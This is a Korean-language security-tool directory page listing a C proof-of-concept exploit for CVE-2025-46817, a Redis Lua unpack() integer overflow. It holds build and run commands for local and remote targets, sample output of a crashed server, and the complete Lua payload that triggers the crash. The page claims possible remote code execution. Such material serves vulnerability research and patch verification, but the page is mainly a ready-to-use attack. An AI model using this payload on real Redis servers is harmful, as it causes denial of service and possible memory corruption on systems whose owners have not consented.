Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-46817-PoC — C 기반 CVE-2025-46817 익스플로잇으로, Redis 정수 오버플로우 취약점을 이용하여 크래시 탐지를 가능하게 하고 Lua unpack() 페이로드를 통한 잠재적 RCE를 지원합니다. | Kitploit
도구/GitHubGitHub/slayerkkkk/cve-2025-46817-poc
Vulnerability AnalysisExploitationFuzzingPenetration TestingDatabase Security
GitHubslayerkkkk/cve-2025-46817-poc

CVE-2025-46817-PoC

C 기반 CVE-2025-46817 익스플로잇으로, Redis 정수 오버플로우 취약점을 이용하여 크래시 탐지를 가능하게 하고 Lua unpack() 페이로드를 통한 잠재적 RCE를 지원합니다.

저장소 보기
210개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2025-46817 Redis 정수 오버플로우 익스플로잇

Banner Language Platform

Redis 정수 오버플로우 취약점에 대한 CVE-2025-46817 익스플로잇의 경량 C 구현입니다.

🚀 기능

  • 경량화: 단일 C 파일, hiredis 외 외부 의존성 없음
  • 고속: 최대 성능을 위한 네이티브 컴파일
  • 컬러 출력: 아름다운 터미널 색상과 아이콘
  • 크래시 감지: 서버 크래시 자동 감지
  • 버전 확인: 취약한 Redis 버전 식별
  • 타임아웃 지원: 연결 타임아웃 설정 가능

📋 요구 사항

Ubuntu/Debian

root@kitploit:~
sudo apt-get update
sudo apt-get install build-essential libhiredis-dev

CentOS/RHEL

root@kitploit:~
sudo yum install gcc hiredis-devel

macOS

root@kitploit:~
brew install hiredis

🔧 컴파일

root@kitploit:~
gcc -o exploit exploit.c -lhiredis

🎯 사용법

기본 사용법

root@kitploit:~
./exploit -H 127.0.0.1 -P 6379

원격 대상

root@kitploit:~
./exploit -H 192.168.1.100 -P 6379 -t 5

명령줄 옵션

root@kitploit:~
-H <host>    Redis 서버 호스트 (필수)
-P <port>    Redis 서버 포트 (필수)  
-t <timeout> 연결 타임아웃(초) (기본값: 10)
-h           도움말 메시지 표시

📊 출력 예시

root@kitploit:~
 ██▓███   █     █░███▄    █  ▄▄▄▄    █    ██   █████▒ █████▒▓█████  ██▀███  
▓██░  ██▒▓█░ █ ░█░██ ▀█   █ ▓█████▄  ██  ▓██▒▓██   ▒▓██   ▒ ▓█   ▀ ▓██ ▒ ██▒
▓██░ ██▓▒▒█░ █ ░█▓██  ▀█ ██▒▒██▒ ▄██▓██  ▒██░▒████ ░▒████ ░ ▒███   ▓██ ░▄█ ▒
▒██▄█▓▒ ▒░█░ █ ░█▓██▒  ▐▌██▒▒██░█▀  ▓▓█  ░██░░▓█▒  ░░▓█▒  ░ ▒▓█  ▄ ▒██▀▀█▄  
▒██▒ ░  ░░░██▒██▓▒██░   ▓██░░▓█  ▀█▓▒▒█████▓ ░▒█░   ░▒█░    ░▒████▒░██▓ ▒██▒
▒▓▒░ ░  ░░ ▓░▒ ▒ ░ ▒░   ▒ ▒ ░▒▓███▀▒░▒▓▒ ▒ ▒  ▒ ░    ▒ ░    ░░ ▒░ ░░ ▒▓ ░▒▓░
░▒ ░       ▒ ░ ░ ░ ░░   ░ ▒░▒░▒   ░ ░░▒░ ░ ░  ░      ░       ░ ░  ░  ░▒ ░ ▒░
░░         ░   ░    ░   ░ ░  ░    ░  ░░░ ░ ░  ░ ░    ░ ░       ░     ░░   ░ 
             ░            ░  ░         ░                       ░  ░   ░     
                                  ░                                         
                    CVE-2025-46817 익스플로잇 도구
                   정수 오버플로우 -> RCE 체인
                   접속 -> https://pwnbuffer.org/

    작성자: Slayerkkk
    대상: Redis <= 8.2.1
    유형: 메모리 손상 -> 코드 실행

ℹ️ 127.0.0.1:6379에 연결 테스트 중...
✅ 연결 성공
ℹ️ Redis 버전: 8.2.1
❌ 취약함 - 버전 <= 8.2.1
ℹ️ Lua 스크립팅 테스트 중...
✅ Lua 활성화됨 (1+1=2)

🚀 익스플로잇 시작
==================================================
💀 익스플로잇 페이로드 실행 중...
    페이로드: unpack()를 통한 정수 오버플로우
💥 서버 크래시 - 연결 끊김!

📊 익스플로잇 결과
==============================
  💥 상태: 크래시됨 (2.34초)

💀 익스플로잇 성공 - 서버 크래시!
   CVE-2025-46817 취약점 확인됨

🛡️ 영향받는 버전

  • Redis <= 8.2.1
  • Redis <= 8.0.3
  • Redis <= 7.4.5
  • Redis <= 7.2.10
  • Redis <= 6.2.19

🔍 기술적 세부 사항

취약점

이 익스플로잇은 Redis의 Lua unpack() 함수 구현(luaB_unpack)에서 발생하는 정수 오버플로우를 대상으로 합니다. 특정 매개변수로 호출하면 부호 있는 정수 연산이 오버플로우되어 Redis가 엄청난 수의 반환 값을 구체화하려고 시도합니다.

익스플로잇 페이로드

root@kitploit:~
local data = {1, 2, 3}
return {unpack(data, -2147483648, 2147483647)}

영향

  • 서버 크래시: 즉각적인 서비스 거부
  • 메모리 손상: 힙/스택 손상
  • 잠재적 RCE: 메모리 손상으로 코드 실행 가능

🎯 탐지 결과

이 도구는 다음 상태 중 하나를 보고합니다:

  • ✅ survived: 서버가 페이로드를 처리함 (패치되었을 가능성 높음)
  • 💥 crashed: 서버 크래시 (취약함)
  • ⚠️ timeout: 서버 응답 없음 (취약할 가능성 높음)
  • ❌ error: 기타 오류 발생

🙏 크레딧

작성자: Slayerkkk
웹사이트: https://pwnbuffer.org

도구 다운로드